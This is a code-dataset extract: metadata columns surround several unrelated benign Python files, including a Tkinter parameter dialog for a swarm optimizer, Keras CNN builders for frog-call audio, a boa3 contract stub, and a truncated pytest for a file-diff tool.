| 0.736416
| 1
| 0
| 0.062793
| 0.00842
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076301
| false
| 0
| 0.003468
| 0.03237
| 0.12948
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
69fa739b307d48215b850736d03b0745bc248b5a
| 8,781
|
py
|
Python
|
HPSO/paramWindow.py
|
andrejadd/ABC-bee-opt
|
746b2f8eb8eeab27e0af515aa129ad8a00b035e5
|
[
"MIT"
] | null | null | null |
HPSO/paramWindow.py
|
andrejadd/ABC-bee-opt
|
746b2f8eb8eeab27e0af515aa129ad8a00b035e5
|
[
"MIT"
] | null | null | null |
HPSO/paramWindow.py
|
andrejadd/ABC-bee-opt
|
746b2f8eb8eeab27e0af515aa129ad8a00b035e5
|
[
"MIT"
] | null | null | null |
import pso
from Tkinter import *
import tkSimpleDialog
import Pmw
OPTMOVESTYLE_SELECTION = ["randomOptMove", "linearOptMove", "randomLinearOptMove", "randomDistanceOptMove"]
UPDATESTYLE_SELECTION = ["updatePeriodic", "updateOnGoal"]
DETECTIONMETHOD_SELECTION = ["upToDate", "gbestDetectChange", "scoutDetectChange"]
RESPONSEMETHOD_SELECTION = ["noResponse", "applyScout", "randomize10", "randomize10reset", \
"randomize16reset", "randomize22reset", "subSwarmsTemporalMerge", "subSwarmsAdaptiveMerge"]
class ParameterWindow:
win = None
pso = None
e1 = None
e2 = None
menu1 = None
menu2 = None
menu3 = None
menu4 = None
moveFrequency = 0
moveDistance = 0.0
def show(self):
self.win.lift()
def apply(self):
#self.pso.optFunction.set_moveFrequency(int(self.e1.get()))
#self.pso.optFunction.set_moveDistance(float(self.e2.get()))
#self.pso.optFunction.set_optMoveStyle(self.menu1.index(self.menu1.getvalue()))
#self.pso.optFunction.set_updateStyle(self.menu2.index(self.menu2.getvalue()))
#self.pso.set_detectionMethod(self.menu3.index(self.menu3.getvalue()))
#self.pso.set_responseMethod(self.menu4.index(self.menu4.getvalue()))
self.pso.setDynamicParameters(int(self.e1.get()), float(self.e2.get()), self.menu1.index(self.menu1.getvalue()),\
self.menu2.index(self.menu2.getvalue()), self.menu3.index(self.menu3.getvalue()), \
self.menu4.index(self.menu4.getvalue()))
self.win.destroy()
def __init__(self, master, pso_in):
self.win = Toplevel()
self.pso = pso_in
label = Label(self.win, text="MoveFrequency")
label.grid(row=0)
self.moveFrequency = self.pso.optFunction.get_moveFrequency()
self.e1 = Entry(self.win)
self.e1.insert(END,str(self.moveFrequency))
self.e1.grid(row=0, column=1)
label = Label(self.win, text="MoveDistance")
label.grid(row=1)
self.moveDistance = self.pso.optFunction.get_moveDistance()
self.e2 = Entry(self.win)
self.e2.insert(END,str(self.moveDistance))
self.e2.grid(row=1, column=1)
# self.l1 = Listbox(self.win, selectmode=SINGLE, height=2 )
# for item in OPTMOVESTYLE_SELECTION:
# self.l1.insert(END, item)
# self.l1.select_set(self.optFunction.get_optMoveStyle())
# self.l1.activate(self.optFunction.get_optMoveStyle())
# self.l1.grid(row=2, column=1)
self.menu1 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'OptimumMoveStyle:',
items = OPTMOVESTYLE_SELECTION,
menubutton_width = 15
)
self.menu1.setvalue(OPTMOVESTYLE_SELECTION[self.pso.optFunction.get_optMoveStyle()])
self.menu1.grid(row=2, columnspan=2)
self.menu2 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'UpdateStyle:',
items = UPDATESTYLE_SELECTION,
menubutton_width = 15
)
self.menu2.setvalue(UPDATESTYLE_SELECTION[self.pso.optFunction.get_updateStyle()])
self.menu2.grid(row=3, columnspan=2)
self.menu3 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'DetectionMethod:',
items = DETECTIONMETHOD_SELECTION,
menubutton_width = 15
)
self.menu3.setvalue(DETECTIONMETHOD_SELECTION[self.pso.get_detectionMethod()])
self.menu3.grid(row=4, columnspan=2)
self.menu4 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'ResponseMethod:',
items = RESPONSEMETHOD_SELECTION,
menubutton_width = 15
)
self.menu4.setvalue(RESPONSEMETHOD_SELECTION[self.pso.get_responseMethod()])
self.menu4.grid(row=5, columnspan=2)
# make a row of buttons
buttons = Pmw.ButtonBox(self.win)
buttons.grid(row= 6, columnspan=2, padx=10, pady=10)
buttons.add('Apply', command=self.apply)
buttons.add('Cancel', command=self.win.destroy)
class ParameterWindow_new:
win = None
param = None
e1 = None
e2 = None
menu1 = None
menu2 = None
menu3 = None
menu4 = None
moveFrequency = 0
moveDistance = 0.0
def show(self):
self.win.lift()
def apply(self):
self.pso.optFunction.set_moveFrequency(int(self.e1.get()))
self.pso.optFunction.set_moveDistance(float(self.e2.get()))
#self.optFunction.set_optMoveStyle(int(self.l1.curselection()[0]))
self.pso.optFunction.set_optMoveStyle(self.menu1.index(self.menu1.getvalue()))
self.pso.optFunction.set_updateStyle(self.menu2.index(self.menu2.getvalue()))
self.pso.set_detectionMethod(self.menu3.index(self.menu3.getvalue()))
self.pso.set_responseMethod(self.menu4.index(self.menu4.getvalue()))
self.win.destroy()
def __init__(self, master, psoParam):
self.win = Toplevel()
self.param = psoParam
self.pso = psoParam  # the methods below still refer to self.pso, so bind both names to avoid an AttributeError
label = Label(self.win, text="MoveFrequency")
label.grid(row=0)
self.moveFrequency = self.pso.optFunction.get_moveFrequency()
self.e1 = Entry(self.win)
self.e1.insert(END,str(self.moveFrequency))
self.e1.grid(row=0, column=1)
label = Label(self.win, text="MoveDistance")
label.grid(row=1)
self.moveDistance = self.pso.optFunction.get_moveDistance()
self.e2 = Entry(self.win)
self.e2.insert(END,str(self.moveDistance))
self.e2.grid(row=1, column=1)
# self.l1 = Listbox(self.win, selectmode=SINGLE, height=2 )
# for item in OPTMOVESTYLE_SELECTION:
# self.l1.insert(END, item)
# self.l1.select_set(self.optFunction.get_optMoveStyle())
# self.l1.activate(self.optFunction.get_optMoveStyle())
# self.l1.grid(row=2, column=1)
self.menu1 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'OptimumMoveStyle:',
items = OPTMOVESTYLE_SELECTION,
menubutton_width = 15
)
self.menu1.setvalue(OPTMOVESTYLE_SELECTION[self.pso.optFunction.get_optMoveStyle()])
self.menu1.grid(row=2, columnspan=2)
self.menu2 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'UpdateStyle:',
items = UPDATESTYLE_SELECTION,
menubutton_width = 15
)
self.menu2.setvalue(UPDATESTYLE_SELECTION[self.pso.optFunction.get_updateStyle()])
self.menu2.grid(row=3, columnspan=2)
self.menu3 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'DetectionMethod:',
items = DETECTIONMETHOD_SELECTION,
menubutton_width = 15
)
self.menu3.setvalue(DETECTIONMETHOD_SELECTION[self.pso.get_detectionMethod()])
self.menu3.grid(row=4, columnspan=2)
self.menu4 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'ResponseMethod:',
items = RESPONSEMETHOD_SELECTION,
menubutton_width = 15
)
self.menu4.setvalue(RESPONSEMETHOD_SELECTION[self.pso.get_responseMethod()])
self.menu4.grid(row=5, columnspan=2)
# make a row of buttons
buttons = Pmw.ButtonBox(self.win)
buttons.grid(row= 6, columnspan=2, padx=10, pady=10)
buttons.add('Apply', command=self.apply)
buttons.add('Cancel', command=self.win.destroy)
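#------------------------------------------------------------------------------#
# Hedged usage sketch (editorial addition). ParameterWindow expects a Tk master
# and a pso object exposing the optFunction getters plus setDynamicParameters();
# pso.PSO() below is an assumed constructor name, since the pso module's API is
# not visible in this file, so the example is left commented out.
# if __name__ == '__main__':
#     root = Tk()
#     Pmw.initialise(root)
#     swarm = pso.PSO()                    # assumed constructor
#     win = ParameterWindow(root, swarm)
#     win.show()
#     root.mainloop()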
| 42.834146
| 116
| 0.544813
| 853
| 8,781
| 5.514654
| 0.126612
| 0.041667
| 0.061224
| 0.035714
| 0.868197
| 0.865221
| 0.865221
| 0.845451
| 0.845451
| 0.845451
| 0
| 0.028925
| 0.34643
| 8,781
| 204
| 117
| 43.044118
| 0.79073
| 0.128687
| 0
| 0.773333
| 0
| 0
| 0.061549
| 0.008754
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.026667
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e1099e931c7f0a3de3ff2966c3376777a9fa83f
| 830
|
py
|
Python
|
tests/basics/bytes_large.py
|
geowor01/micropython
|
7fb13eeef4a85f21cae36f1d502bcc53880e1815
|
[
"MIT"
] | 7
|
2019-10-18T13:41:39.000Z
|
2022-03-15T17:27:57.000Z
|
tests/basics/bytes_large.py
|
geowor01/micropython
|
7fb13eeef4a85f21cae36f1d502bcc53880e1815
|
[
"MIT"
] | null | null | null |
tests/basics/bytes_large.py
|
geowor01/micropython
|
7fb13eeef4a85f21cae36f1d502bcc53880e1815
|
[
"MIT"
] | 2
|
2020-06-23T09:10:15.000Z
|
2020-12-22T06:42:14.000Z
|
b1 = b"long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes"
b2 = b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes"
print("PASS")
| 207.5
| 458
| 0.808434
| 135
| 830
| 4.97037
| 0.059259
| 0.549925
| 0.774963
| 1.073025
| 0.979136
| 0.979136
| 0.979136
| 0.979136
| 0.979136
| 0.979136
| 0
| 0.002813
| 0.143373
| 830
| 4
| 459
| 207.5
| 0.940928
| 0
| 0
| 0
| 0
| 0.333333
| 0.8929
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.333333
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 14
|
2a26731073722172e47e874cd99286013f80c742
| 106
|
py
|
Python
|
samples/ack_irrelevants.py
|
nitish-awasthi/msiempy
|
e0b1f4d2f2e0c837708f32c5be841a572603b32c
|
[
"MIT"
] | 20
|
2019-06-12T00:30:17.000Z
|
2022-03-16T23:20:00.000Z
|
samples/ack_irrelevants.py
|
nitish-awasthi/msiempy
|
e0b1f4d2f2e0c837708f32c5be841a572603b32c
|
[
"MIT"
] | 49
|
2019-06-11T14:41:06.000Z
|
2022-02-22T21:46:40.000Z
|
samples/ack_irrelevants.py
|
nitish-awasthi/msiempy
|
e0b1f4d2f2e0c837708f32c5be841a572603b32c
|
[
"MIT"
] | 20
|
2019-06-10T14:38:59.000Z
|
2020-11-14T22:19:55.000Z
|
# Now at: https://github.com/mfesiem/ack-irrelevants-ips-alarms/blob/master/ack-irrelevants-ips-alarms.py
| 53
| 105
| 0.792453
| 17
| 106
| 4.941176
| 0.764706
| 0.333333
| 0.404762
| 0.547619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037736
| 106
| 1
| 106
| 106
| 0.823529
| 0.971698
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2a506067881f3306976a96825de4d397c8724421
| 44
|
py
|
Python
|
project_specific/__init__.py
|
jonntd/PipelineTools
|
84412c2c2ce27de874afb6aa5d56fd94e12e4536
|
[
"BSD-2-Clause"
] | 5
|
2019-07-19T22:11:07.000Z
|
2022-02-15T02:02:51.000Z
|
project_specific/__init__.py
|
blueroseslol/PipelineTools
|
6ba3da17dcc97b7ef0c99f9ebbbf4c41516b31c0
|
[
"BSD-2-Clause"
] | null | null | null |
project_specific/__init__.py
|
blueroseslol/PipelineTools
|
6ba3da17dcc97b7ef0c99f9ebbbf4c41516b31c0
|
[
"BSD-2-Clause"
] | 3
|
2018-06-05T09:00:13.000Z
|
2020-04-27T14:13:44.000Z
|
import ns57
def _reload():
reload(ns57)
| 11
| 16
| 0.681818
| 6
| 44
| 4.833333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 0.204545
| 44
| 4
| 16
| 11
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa5523d8ef6088fb089ab34ae2acfe955b799f8e
| 171
|
py
|
Python
|
boa3_test/test_sc/interop_test/runtime/ScriptContainer.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3_test/test_sc/interop_test/runtime/ScriptContainer.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3_test/test_sc/interop_test/runtime/ScriptContainer.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
from typing import Any
from boa3.builtin import public
from boa3.builtin.interop.runtime import script_container
@public
def main() -> Any:
return script_container
| 17.1
| 57
| 0.789474
| 24
| 171
| 5.541667
| 0.583333
| 0.120301
| 0.225564
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013793
| 0.152047
| 171
| 9
| 58
| 19
| 0.903448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
aa5961288069a2d5252aeba9832bd00333494052
| 6,930
|
py
|
Python
|
Project_FrogLossFunctionCNN_Aus/MyClass_python/deep_model_frog_activity.py
|
Frog-Analysis/Project_FrogLossFunctionCNN
|
c2a1d440d5eb45577f5e3b28b3d29ab42eb606df
|
[
"MIT"
] | null | null | null |
Project_FrogLossFunctionCNN_Aus/MyClass_python/deep_model_frog_activity.py
|
Frog-Analysis/Project_FrogLossFunctionCNN
|
c2a1d440d5eb45577f5e3b28b3d29ab42eb606df
|
[
"MIT"
] | null | null | null |
Project_FrogLossFunctionCNN_Aus/MyClass_python/deep_model_frog_activity.py
|
Frog-Analysis/Project_FrogLossFunctionCNN
|
c2a1d440d5eb45577f5e3b28b3d29ab42eb606df
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 24 20:31:02 2021
@author: Administrator
"""
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, Dropout, MaxPooling1D, Conv1D, Concatenate
from tensorflow.compat.v1.keras.layers import CuDNNLSTM as LSTM
from keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling1D, GlobalAveragePooling2D, ZeroPadding2D
# from keras.layers import Conv3D, MaxPooling3D, TimeDistributed
from keras.layers.normalization import BatchNormalization
#------------------------------------------------------------------------------#
def build_1D_CNN_model(feat_final, num_classes):
# build 1D CNN
#------#
model = Sequential()
model.add(Conv1D(filters=16, kernel_size=32, strides=2, input_shape = feat_final.shape[1:]))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv1D(filters=32, kernel_size=16, strides=2))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv1D(filters=64, kernel_size=8, strides=2))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(LSTM(128, return_sequences=True))
# model.add(CuDNNLSTM(128, return_sequences=True))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
return model
def build_1D_CNN_model_GAP(feat_final, num_classes):
# build 1D CNN
#------#
model = Sequential()
model.add(Conv1D(filters=16, kernel_size=32, strides=2, input_shape = feat_final.shape[1:]))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv1D(filters=32, kernel_size=16, strides=2))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv1D(filters=64, kernel_size=8, strides=2))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(LSTM(128, return_sequences=True))
# model.add(CuDNNLSTM(128, return_sequences=True))
model.add(GlobalAveragePooling1D())  # 1D pooling: the Conv1D/LSTM stack above yields 3D tensors, so 2D pooling would fail
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
return model
def build_2D_CNN_model(feat_final, num_classes):
#------#
# build 2D CNN
model = Sequential()
model.add(Conv2D(32, (3, 3), input_shape = feat_final.shape[1:]))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(128, (3, 3)))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(128, (3, 3)))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(0.2))
model.add(GlobalAveragePooling2D())
model.add(Dropout(0.2)) # add
model.add(Dense(1000))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes))
model.add(Activation('softmax'))
return model
def build_1D_2D_CNN_model(input1, input2, num_classes):
#------#
# build 1D CNN
input_ft = input1
input_ft = Conv1D(filters=16, kernel_size=32, strides=2)(input_ft)
input_ft = BatchNormalization()(input_ft)
input_ft = Activation("relu")(input_ft)
input_ft = MaxPooling1D(pool_size=2)(input_ft)
input_ft = Conv1D(filters=32, kernel_size=16, strides=2)(input_ft)
input_ft = BatchNormalization()(input_ft)
input_ft = Activation("relu")(input_ft)
input_ft = MaxPooling1D(pool_size=2)(input_ft)
input_ft = Conv1D(filters=64, kernel_size=8, strides=2)(input_ft)
input_ft = BatchNormalization()(input_ft)
input_ft = Activation("relu")(input_ft)
input_ft = MaxPooling1D(pool_size=2)(input_ft)
input_ft = LSTM(128, return_sequences=True)(input_ft)
# input_ft = CuDNNLSTM(128, return_sequences=True)(input_ft)
input_ft = Flatten()(input_ft)
#------#
# build 2D CNN
input_rd = input2
input_rd = Conv2D(32, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = Conv2D(32, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = MaxPooling2D(pool_size=(2, 2), strides=(2, 2))(input_rd)
input_rd = Dropout(0.2)(input_rd)
input_rd = Conv2D(64, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = Conv2D(64, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = MaxPooling2D(pool_size=(2, 2), strides=(2, 2))(input_rd)
input_rd = Dropout(0.2)(input_rd)
input_rd = Conv2D(128, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = Conv2D(128, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = MaxPooling2D(pool_size=(2, 2), strides=(2, 2))(input_rd)
input_rd = Dropout(0.2)(input_rd)
input_rd = Flatten()(input_rd)
#-----
out = Concatenate()([input_ft, input_rd])
out = Dense(1000, activation='relu')(out)
out = Dropout(0.5)(out)
out = Dense(num_classes, activation='softmax')(out)
return out
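#------------------------------------------------------------------------------#
# Hedged usage sketch (editorial addition). The array shape below is a made-up
# placeholder; the real feature tensors are produced elsewhere in the project.
# Left commented out because the builders rely on CuDNNLSTM, which needs a
# GPU-enabled TensorFlow build.
# import numpy as np
# feat_final = np.zeros((8, 4096, 1), dtype='float32')   # (samples, steps, channels), assumed
# model = build_1D_CNN_model(feat_final, num_classes=5)
# model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])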
| 31.935484
| 96
| 0.65974
| 936
| 6,930
| 4.71688
| 0.087607
| 0.143148
| 0.08154
| 0.09513
| 0.855266
| 0.813364
| 0.807022
| 0.797961
| 0.769875
| 0.76376
| 0
| 0.053668
| 0.171861
| 6,930
| 216
| 97
| 32.083333
| 0.71563
| 0.070996
| 0
| 0.808219
| 0
| 0
| 0.019997
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027397
| false
| 0
| 0.034247
| 0
| 0.089041
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa962f3e768ea8057ce3757606c000477b84c768
| 138
|
py
|
Python
|
tests/utils.py
|
shizuku/dpln
|
d6f62e97073313a92ba492bbf1b9cd57842a8369
|
[
"MIT"
] | 3
|
2021-10-16T11:43:16.000Z
|
2021-10-31T13:32:04.000Z
|
tests/utils.py
|
shizuku/dpln
|
d6f62e97073313a92ba492bbf1b9cd57842a8369
|
[
"MIT"
] | null | null | null |
tests/utils.py
|
shizuku/dpln
|
d6f62e97073313a92ba492bbf1b9cd57842a8369
|
[
"MIT"
] | 1
|
2021-10-14T04:06:40.000Z
|
2021-10-14T04:06:40.000Z
|
import numpy as np
def np_feq(a: np.ndarray, b: np.ndarray, epsilon: float = 2e-15) -> bool:
return (np.abs(a - b) < epsilon).all()
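# Hedged usage sketch (editorial addition): np_feq reports two arrays as equal
# when every element differs by less than epsilon.
if __name__ == "__main__":
    a = np.array([0.1, 0.2, 0.3])
    assert np_feq(a, a + 1e-16)      # within the default tolerance
    assert not np_feq(a, a + 1e-3)   # well outside the tolerance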
| 23
| 73
| 0.630435
| 25
| 138
| 3.44
| 0.68
| 0.209302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027027
| 0.195652
| 138
| 5
| 74
| 27.6
| 0.747748
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2ad0d2fafcbaa0dbe0ac361f3936d31d31ce9f85
| 85
|
py
|
Python
|
baobab/data_augmentation/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 8
|
2019-09-11T15:11:57.000Z
|
2022-02-03T08:24:52.000Z
|
baobab/data_augmentation/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 52
|
2019-08-29T00:39:11.000Z
|
2021-01-02T22:49:41.000Z
|
baobab/data_augmentation/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 2
|
2019-09-26T23:38:47.000Z
|
2020-02-18T10:07:04.000Z
|
from .noise_lenstronomy import *
#from .noise_torch import *
#from .noise_tf import *
| 28.333333
| 32
| 0.776471
| 12
| 85
| 5.25
| 0.5
| 0.428571
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129412
| 85
| 3
| 33
| 28.333333
| 0.851351
| 0.576471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2d563b55a1baf9c052923e2146f09b7dc20f147a
| 5,967
|
py
|
Python
|
filediffs/filediffs_python/tests/test_filediffs.py
|
INWTlab/filediffs
|
38328ed325c76afdbcbe878792b67383ce30b782
|
[
"MIT"
] | null | null | null |
filediffs/filediffs_python/tests/test_filediffs.py
|
INWTlab/filediffs
|
38328ed325c76afdbcbe878792b67383ce30b782
|
[
"MIT"
] | 2
|
2020-06-24T12:14:24.000Z
|
2021-04-21T08:04:12.000Z
|
filediffs/filediffs_python/tests/test_filediffs.py
|
INWTlab/filediffs
|
38328ed325c76afdbcbe878792b67383ce30b782
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from time import time
from filediffs.filediffs_python.filediffs import file_diffs
def test_file_diffs_are_created():
# arrange
fp1 = str(Path(__file__).parent / "data" / "file_1.txt")
fp2 = str(Path(__file__).parent / "data" / "file_2.txt")
# outfile path for cleanup
outfile_p_both = Path(__file__).parent / "lines_present_in_both_files.txt"
outfile_p_1 = Path(__file__).parent / "lines_present_only_in_file1.txt"
outfile_p_2 = Path(__file__).parent / "lines_present_only_in_file2.txt"
# act
file_diffs(
filename_1=fp1, filename_2=fp2,
outpath_lines_present_in_both_files=str(outfile_p_both),
outpath_lines_present_only_in_file1=str(outfile_p_1),
outpath_lines_present_only_in_file2=str(outfile_p_2),
verbose=False
)
# assert
assert outfile_p_both.exists()
assert outfile_p_1.exists()
assert outfile_p_2.exists()
lines_f1 = []
with open(outfile_p_1) as fcon1:
for line in fcon1:
lines_f1.append(bytes(line, "utf-8"))
lines_f2 = []
with open(outfile_p_2) as fcon2:
for line in fcon2:
lines_f2.append(bytes(line, "utf-8"))
lines_f_both = []
with open(outfile_p_both) as fconb:
for line in fconb:
lines_f_both.append(bytes(line, "utf-8"))
assert lines_f1 == [
b'"1";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"2";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
